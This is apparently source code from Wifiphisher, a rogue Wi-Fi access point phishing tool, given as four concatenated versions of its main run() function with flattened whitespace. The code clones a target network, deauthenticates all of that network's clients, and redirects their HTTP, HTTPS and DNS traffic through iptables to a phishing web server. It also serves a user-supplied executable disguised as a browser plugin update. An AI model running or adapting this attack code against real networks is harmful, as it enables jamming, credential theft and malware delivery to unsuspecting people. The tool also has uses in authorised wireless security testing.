def run(): print ('[' + T + '*' + W + '] Starting Wifiphisher %s at %s' % (VERSION, time.strftime("%Y-%m-%d %H:%M"))) # Parse args global args, APs, clients_APs, mon_MAC, mac_matcher, hop_daemon_running args = parse_args() # Check args check_args(args) # Are you root? if os.geteuid(): sys.exit('[' + R + '-' + W + '] Please run as root') # TODO: We should have more checks here: # Is anything binded to our HTTP(S) ports? # Maybe we should save current iptables rules somewhere network_manager = interfaces.NetworkManager() mac_matcher = macmatcher.MACMatcher(MAC_PREFIX_FILE) fw = firewall.Fw() # get interfaces for monitor mode and AP mode and set the monitor interface # to monitor mode. shutdown on any errors try: if args.internetinterface: internet_interface = network_manager.set_internet_iface(args.internetinterface) if not args.nojamming: if args.jamminginterface and args.apinterface: mon_iface = network_manager.get_jam_iface( args.jamminginterface) ap_iface = network_manager.get_ap_iface(args.apinterface) else: mon_iface, ap_iface = network_manager.find_interface_automatically() network_manager.set_jam_iface(mon_iface.get_name()) network_manager.set_ap_iface(ap_iface.get_name()) # display selected interfaces to the user print ("[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication " "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the " "rogue Access Point").format(G, W, mon_iface.get_name(), ap_iface.get_name()) else: if args.apinterface: ap_iface = network_manager.get_ap_iface( interface_name=args.apinterface) else: ap_iface = network_manager.get_ap_iface() mon_iface = ap_iface network_manager.set_ap_iface(ap_iface.get_name()) print ("[{0}+{1}] Selecting {0}{2}{1} interface for creating the " "rogue Access Point").format(G, W, ap_iface.get_name()) kill_interfering_procs() network_manager.set_interface_mode(mon_iface, "monitor") except (interfaces.NotEnoughInterfacesFoundError, interfaces.JammingInterfaceInvalidError, interfaces.ApInterfaceInvalidError, interfaces.NoApInterfaceFoundError, interfaces.NoMonitorInterfaceFoundError) as err: print ("[{0}!{1}] " + str(err)).format(R, W) time.sleep(2) shutdown() if args.internetinterface: fw.nat(ap_iface.get_name(), args.internetinterface) set_ip_fwd() else: fw.redirect_requests_localhost() set_route_localnet() if not args.internetinterface: network_manager.up_ifaces([ap_iface, mon_iface]) print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables' if args.essid: essid = args.essid channel = str(CHANNEL) args.accesspoint = False args.channel = False ap_mac = None enctype = None else: # Copy AP time.sleep(3) hop = Thread(target=channel_hop, args=(mon_iface,)) hop.daemon = True hop.start() sniffing(mon_iface.get_name(), targeting_cb) channel, essid, ap_mac, enctype = copy_AP() args.accesspoint = ap_mac args.channel = channel hop_daemon_running = False # get the correct template template = select_template(args.phishingscenario) print ("[" + G + "+" + W + "] Selecting " + template.get_display_name() + " template") # payload selection for browser plugin update if template.has_payload(): payload_path = False # copy payload to update directory while not payload_path or not os.path.isfile(payload_path): # get payload path payload_path = raw_input("[" + G + "+" + W + "] Enter the [" + G + "full path" + W + "] to the payload you wish to serve: ") if not os.path.isfile(payload_path): print '[' + R + '-' + W + '] Invalid file path!' print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload ' copyfile(payload_path, PHISHING_PAGES_DIR + template.get_payload_path()) APs_context = [] for i in APs: APs_context.append({ 'channel': APs[i][0] or "", 'essid': APs[i][1] or "", 'bssid': APs[i][2] or "", 'vendor': mac_matcher.get_vendor_name(APs[i][2]) or "" }) template.merge_context({'APs': APs_context}) ap_logo_path = template.use_file(mac_matcher.get_vendor_logo_path(ap_mac)) template.merge_context({ 'target_ap_channel': args.channel or "", 'target_ap_essid': essid or "", 'target_ap_bssid': ap_mac or "", 'target_ap_encryption': enctype or "", 'target_ap_vendor': mac_matcher.get_vendor_name(ap_mac) or "", 'target_ap_logo_path': ap_logo_path or "" }) # We want to set this now for hostapd. Maybe the interface was in "monitor" # mode for network discovery before (e.g. when --nojamming is enabled). network_manager.set_interface_mode(ap_iface, "managed") # Start AP start_ap(ap_iface.get_name(), channel, essid, args) dhcpconf = dhcp_conf(ap_iface.get_name()) if not dhcp(dhcpconf, ap_iface.get_name()): print('[' + G + '+' + W + '] Could not set IP address on %s!' % ap_iface.get_name() ) shutdown(template=template) subprocess.call('clear', shell=True) print ('[' + T + '*' + W + '] ' + T + essid + W + ' set up on channel ' + T + channel + W + ' via ' + T + mon_iface.get_name() + W + ' on ' + T + str(ap_iface.get_name()) + W) # With configured DHCP, we may now start the web server if not args.internetinterface: # Start HTTP server in a background thread print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str(PORT) + ", " + str(SSL_PORT) webserver = Thread(target=phishinghttp.runHTTPServer, args=(NETWORK_GW_IP, PORT, SSL_PORT, template)) webserver.daemon = True webserver.start() time.sleep(1.5) # We no longer need mac_matcher mac_matcher.unbind() clients_APs = [] APs = [] monitor_on = None conf.iface = mon_iface.get_name() mon_MAC = mon_mac(mon_iface.get_name()) if not args.nojamming: monchannel = channel # set the channel on the deauthenticating interface mon_iface.set_channel(int(channel)) # start deauthenticating all client on target access point deauthentication = deauth.Deauthentication(ap_mac, mon_iface.get_name()) deauthentication.deauthenticate() # Main loop. try: term = Terminal() with term.fullscreen(): while 1: term.clear() with term.hidden_cursor(): print term.move(0, term.width - 30) + "|" print term.move(1, term.width - 30) + "|" + " " + term.bold_blue("Wifiphisher " + VERSION) print term.move(2, term.width - 30) + "|" + " ESSID: " + essid print term.move(3, term.width - 30) + "|" + " Channel: " + channel print term.move(4, term.width - 30) + "|" + " AP interface: " + mon_iface.get_name() print term.move(5, term.width - 30) + "|" + "_"*29 print term.move(1, 0) + term.blue("Jamming the following clients: ") if not args.nojamming: # only show clients when jamming if deauthentication.get_clients(): # show the 5 most recent devices for client in deauthentication.get_clients()[-5:]: print client print term.move(9,0) + term.blue("DHCP Leases: ") if os.path.isfile('/var/lib/misc/dnsmasq.leases'): proc = check_output(['tail', '-5', '/var/lib/misc/dnsmasq.leases']) print term.move(10,0) + proc print term.move(17,0) + term.blue("HTTP requests: ") if os.path.isfile('/tmp/wifiphisher-webserver.tmp'): proc = check_output(['tail', '-5', '/tmp/wifiphisher-webserver.tmp']) print term.move(18,0) + proc if phishinghttp.terminate and args.quitonsuccess: raise KeyboardInterrupt except KeyboardInterrupt: shutdown(deauthentication, template, network_manager)
def run(): print ('[' + T + '*' + W + '] Starting Wifiphisher %s at %s' % \ (VERSION, time.strftime("%Y-%m-%d %H:%M"))) # Initialize a list to store the used interfaces used_interfaces = list() # Parse args global args, APs, clients_APs, mon_MAC, mac_matcher, hop_daemon_running args = parse_args() # Check args check_args(args) # Are you root? if os.geteuid(): sys.exit('[' + R + '-' + W + '] Please run as root') # Get hostapd, dnsmasq or ifconfig if needed get_hostapd() get_dnsmasq() get_ifconfig() # TODO: We should have more checks here: # Is anything binded to our HTTP(S) ports? # Maybe we should save current iptables rules somewhere network_manager = interfaces.NetworkManager(args.jamminginterface, args.apinterface) mac_matcher = macmatcher.MACMatcher(MAC_PREFIX_FILE) # get interfaces for monitor mode and AP mode and set the monitor interface # to monitor mode. shutdown on any errors try: mon_iface, ap_iface = network_manager.get_interfaces() kill_interfering_procs() # TODO: this line should be removed once all the wj_iface have been # removed wj_iface = mon_iface # display selected interfaces to the user print ("[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "\ "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "\ "rogue Access Point").format(G, W, mon_iface, ap_iface) # set monitor mode to monitor interface network_manager.set_interface_mode(mon_iface, "monitor") except (interfaces.NotEnoughInterfacesFoundError, interfaces.JammingInterfaceInvalidError, interfaces.ApInterfaceInvalidError, interfaces.NoApInterfaceFoundError, interfaces.NoMonitorInterfaceFoundError) as err: print("[{0}!{1}] " + str(err)).format(R, W) time.sleep(2) shutdown() # add the selected interfaces to the used list used_interfaces = [mon_iface, ap_iface] # Set iptable rules and kernel variables. os.system(( 'iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination %s:%s' % (NETWORK_GW_IP, PORT))) os.system(( 'iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination %s:%s' % (NETWORK_GW_IP, 53))) os.system(( 'iptables -t nat -A PREROUTING -p tcp --dport 53 -j DNAT --to-destination %s:%s' % (NETWORK_GW_IP, 53))) os.system(( 'iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination %s:%s' % (NETWORK_GW_IP, SSL_PORT))) Popen(['sysctl', '-w', 'net.ipv4.conf.all.route_localnet=1'], stdout=DN, stderr=PIPE) print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables' # Copy AP time.sleep(3) hop = Thread(target=channel_hop, args=(mon_iface, )) hop.daemon = True hop.start() sniffing(mon_iface, targeting_cb) channel, essid, ap_mac = copy_AP() hop_daemon_running = False # get the correct template template = select_template(args.template) print("[" + G + "+" + W + "] Selecting " + template.get_display_name() + " template") # payload selection for browser plugin update if "Browser Plugin Update" in template.get_display_name(): # get payload path payload_path = raw_input("\n[" + G + "+" + W + "] Enter the [" + G + "full path" + W + "] to the payload you wish to serve: ") # copy payload to update directory while not os.path.isfile(payload_path): print "Invalid file path" payload_path = raw_input("\n[" + G + "+" + W + "] Enter the [" + G + "full path" + W + "] to the payload you wish to serve: ") print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload ' copyfile(payload_path, PHISHING_PAGES_DIR + '/plugin_update/update/update.exe') APs_context = [] for i in APs: APs_context.append({ 'channel': APs[i][0], 'essid': APs[i][1], 'bssid': APs[i][2], 'vendor': mac_matcher.get_vendor_name(APs[i][2]) }) template.merge_context({'APs': APs_context}) template.merge_context({ 'target_ap_channel': channel, 'target_ap_essid': essid, 'target_ap_bssid': ap_mac, 'target_ap_vendor': mac_matcher.get_vendor_name(ap_mac) }) phishinghttp.serve_template(template) # Start AP start_ap(ap_iface, channel, essid, args) dhcpconf = dhcp_conf(ap_iface) if not dhcp(dhcpconf, ap_iface): print('[' + G + '+' + W + '] Could not set IP address on %s!' % ap_iface) shutdown() os.system('clear') print('[' + T + '*' + W + '] ' + T + essid + W + ' set up on channel ' + T + channel + W + ' via ' + T + mon_iface + W + ' on ' + T + str(ap_iface) + W) # With configured DHCP, we may now start the web server # Start HTTP server in a background thread Handler = phishinghttp.HTTPRequestHandler try: httpd = phishinghttp.HTTPServer((NETWORK_GW_IP, PORT), Handler) except socket.error, v: errno = v[0] sys.exit(('\n[' + R + '-' + W + '] Unable to start HTTP server (socket errno ' + str(errno) + ')!\n' + '[' + R + '-' + W + '] Maybe another process is running on port ' + str(PORT) + '?\n' + '[' + R + '!' + W + '] Closing'))
def run(): print ('[' + T + '*' + W + '] Starting Wifiphisher %s at %s' % \ (VERSION, time.strftime("%Y-%m-%d %H:%M"))) # Parse args global args, APs, clients_APs, mon_MAC, mac_matcher, hop_daemon_running args = parse_args() # Check args check_args(args) # Are you root? if os.geteuid(): sys.exit('[' + R + '-' + W + '] Please run as root') # TODO: We should have more checks here: # Is anything binded to our HTTP(S) ports? # Maybe we should save current iptables rules somewhere network_manager = interfaces.NetworkManager() mac_matcher = macmatcher.MACMatcher(MAC_PREFIX_FILE) # get interfaces for monitor mode and AP mode and set the monitor interface # to monitor mode. shutdown on any errors try: if not args.nojamming: if args.jamminginterface and args.apinterface: mon_iface = network_manager.get_jam_iface( args.jamminginterface) ap_iface = network_manager.get_ap_iface(args.apinterface) else: mon_iface, ap_iface = network_manager.find_interface_automatically( ) network_manager.set_jam_iface(mon_iface.get_name()) network_manager.set_ap_iface(ap_iface.get_name()) # display selected interfaces to the user print ("[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "\ "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "\ "rogue Access Point").format(G, W, mon_iface.get_name(), ap_iface.get_name()) else: ap_iface = network_manager.get_ap_iface() mon_iface = ap_iface network_manager.set_ap_iface(ap_iface.get_name()) print ("[{0}+{1}] Selecting {0}{2}{1} interface for creating the "\ "rogue Access Point").format(G, W, ap_iface.get_name()) kill_interfering_procs() # set monitor mode to monitor interface network_manager.set_interface_mode(mon_iface, "monitor") except (interfaces.NotEnoughInterfacesFoundError, interfaces.JammingInterfaceInvalidError, interfaces.ApInterfaceInvalidError, interfaces.NoApInterfaceFoundError, interfaces.NoMonitorInterfaceFoundError) as err: print("[{0}!{1}] " + str(err)).format(R, W) time.sleep(2) shutdown() set_fw_rules() set_kernel_var() network_manager.up_ifaces([ap_iface, mon_iface]) print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables' if args.essid: essid = args.essid channel = str(CHANNEL) args.accesspoint = False args.channel = False ap_mac = None else: # Copy AP time.sleep(3) hop = Thread(target=channel_hop, args=(mon_iface, )) hop.daemon = True hop.start() sniffing(mon_iface.get_name(), targeting_cb) channel, essid, ap_mac, enctype = copy_AP() args.accesspoint = ap_mac args.channel = channel hop_daemon_running = False # get the correct template template = select_template(args.phishingscenario) print("[" + G + "+" + W + "] Selecting " + template.get_display_name() + " template") # payload selection for browser plugin update if template.has_payload(): payload_path = False # copy payload to update directory while not payload_path or not os.path.isfile(payload_path): # get payload path payload_path = raw_input("[" + G + "+" + W + "] Enter the [" + G + "full path" + W + "] to the payload you wish to serve: ") if not os.path.isfile(payload_path): print '[' + R + '-' + W + '] Invalid file path!' print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload ' copyfile(payload_path, PHISHING_PAGES_DIR + template.get_payload_path()) APs_context = [] for i in APs: APs_context.append({ 'channel': APs[i][0], 'essid': APs[i][1], 'bssid': APs[i][2], 'vendor': mac_matcher.get_vendor_name(APs[i][2]) }) template.merge_context({'APs': APs_context}) ap_logo_path = template.use_file(mac_matcher.get_vendor_logo_path(ap_mac)) template.merge_context({ 'target_ap_channel': args.channel, 'target_ap_essid': essid, 'target_ap_bssid': ap_mac, 'target_ap_encryption': enctype, 'target_ap_vendor': mac_matcher.get_vendor_name(ap_mac), 'target_ap_logo_path': ap_logo_path }) phishinghttp.serve_template(template) # We want to set this now for hostapd. Maybe the interface was in "monitor" # mode for network discovery before (e.g. when --nojamming is enabled). network_manager.set_interface_mode(ap_iface, "managed") # Start AP start_ap(ap_iface.get_name(), channel, essid, args) dhcpconf = dhcp_conf(ap_iface.get_name()) if not dhcp(dhcpconf, ap_iface.get_name()): print('[' + G + '+' + W + '] Could not set IP address on %s!' % ap_iface.get_name()) shutdown(template) os.system('clear') print('[' + T + '*' + W + '] ' + T + essid + W + ' set up on channel ' + T + channel + W + ' via ' + T + mon_iface.get_name() + W + ' on ' + T + str(ap_iface.get_name()) + W) # With configured DHCP, we may now start the web server # Start HTTP server in a background thread Handler = phishinghttp.HTTPRequestHandler try: httpd = phishinghttp.HTTPServer((NETWORK_GW_IP, PORT), Handler) except socket.error, v: errno = v[0] sys.exit(('\n[' + R + '-' + W + '] Unable to start HTTP server (socket errno ' + str(errno) + ')!\n' + '[' + R + '-' + W + '] Maybe another process is running on port ' + str(PORT) + '?\n' + '[' + R + '!' + W + '] Closing'))
def run(): print " _ __ _ _ _ _ " print " (_)/ _(_) | | (_) | | " print " __ ___| |_ _ _ __ | |__ _ ___| |__ ___ _ __ " print " \ \ /\ / / | _| | '_ \| '_ \| / __| '_ \ / _ \ '__|" print " \ V V /| | | | | |_) | | | | \__ \ | | | __/ | " print " \_/\_/ |_|_| |_| .__/|_| |_|_|___/_| |_|\___|_| " print " | | " print " |_| " print " " # Initialize a list to store the used interfaces used_interfaces = list() # Parse args global args, APs, clients_APs, mon_MAC, mac_matcher args = parse_args() # Check args check_args(args) # Are you root? if os.geteuid(): sys.exit('[' + R + '-' + W + '] Please run as root') # Get hostapd if needed get_hostapd() # Get dnsmasq if needed get_dnsmasq() # TODO: We should have more checks here: # Is anything binded to our HTTP(S) ports? # Maybe we should save current iptables rules somewhere network_manager = interfaces.NetworkManager(args.jamminginterface, args.apinterface) mac_matcher = macmatcher.MACMatcher(MAC_PREFIX_FILE) # get interfaces for monitor mode and AP mode and set the monitor interface # to monitor mode. shutdown on any errors try: mon_iface, ap_iface = network_manager.get_interfaces() # TODO: this line should be removed once all the wj_iface have been # removed wj_iface = mon_iface # display selected interfaces to the user print ("\n[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "\ "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "\ "rogue access point").format(G, W, mon_iface, ap_iface) # set monitor mode to monitor interface network_manager.set_interface_mode(mon_iface, "monitor") except (interfaces.NotEnoughInterfacesFoundError, interfaces.JammingInterfaceInvalidError, interfaces.ApInterfaceInvalidError, interfaces.NoApInterfaceFoundError, interfaces.NoMonitorInterfaceFoundError, interfaces.IwCmdError, interfaces.IwconfigCmdError, interfaces.IfconfigCmdError) as err: print("[{0}!{1}] " + str(err)).format(R, W) shutdown() # add the selected interfaces to the used list used_interfaces = [mon_iface, ap_iface] # Set iptable rules and kernel variables. os.system(( 'iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination %s:%s' % (NETWORK_GW_IP, PORT))) os.system(( 'iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination %s:%s' % (NETWORK_GW_IP, SSL_PORT))) Popen(['sysctl', '-w', 'net.ipv4.conf.all.route_localnet=1'], stdout=DN, stderr=PIPE) print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables' # Copy AP time.sleep(3) hop = Thread(target=channel_hop, args=(mon_iface, )) hop.daemon = True hop.start() sniffing(mon_iface, targeting_cb) channel, essid, ap_mac = copy_AP() hop_daemon_running = False # get the correct template template = select_template(args.template) print("[" + G + "+" + W + "] Selecting " + template.get_display_name() + " template") # payload selection for browser plugin update if "Browser Plugin Update" in template.get_display_name(): # get payload path payload_path = raw_input("\n[" + G + "+" + W + "] Enter the [" + G + "full path" + W + "] to the payload you wish to serve: ") # copy payload to update directory while not os.path.isfile(payload_path): print "Invalid file path" payload_path = raw_input("\n[" + G + "+" + W + "] Enter the [" + G + "full path" + W + "] to the payload you wish to serve: ") print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload ' copyfile(payload_path, PHISHING_PAGES_DIR + '/plugin_update/update/update.exe') # set the path for the template phishinghttp.set_template_path(template.get_path()) # Kill any possible programs that may interfere with the wireless card # Only for systems with airmon-ng installed if os.path.isfile('/usr/sbin/airmon-ng'): proc = Popen(['airmon-ng', 'check', 'kill'], stdout=PIPE, stderr=DN) # Start AP start_ap(ap_iface, channel, essid, args) dhcpconf = dhcp_conf(ap_iface) if not dhcp(dhcpconf, ap_iface): print('[' + G + '+' + W + '] Could not set IP address on %s!' % ap_iface) shutdown() os.system('clear') print('[' + T + '*' + W + '] ' + T + essid + W + ' set up on channel ' + T + channel + W + ' via ' + T + mon_iface + W + ' on ' + T + str(ap_iface) + W) # With configured DHCP, we may now start the web server # Start HTTP server in a background thread Handler = phishinghttp.HTTPRequestHandler try: httpd = phishinghttp.HTTPServer((NETWORK_GW_IP, PORT), Handler) except socket.error, v: errno = v[0] sys.exit(('\n[' + R + '-' + W + '] Unable to start HTTP server (socket errno ' + str(errno) + ')!\n' + '[' + R + '-' + W + '] Maybe another process is running on port ' + str(PORT) + '?\n' + '[' + R + '!' + W + '] Closing'))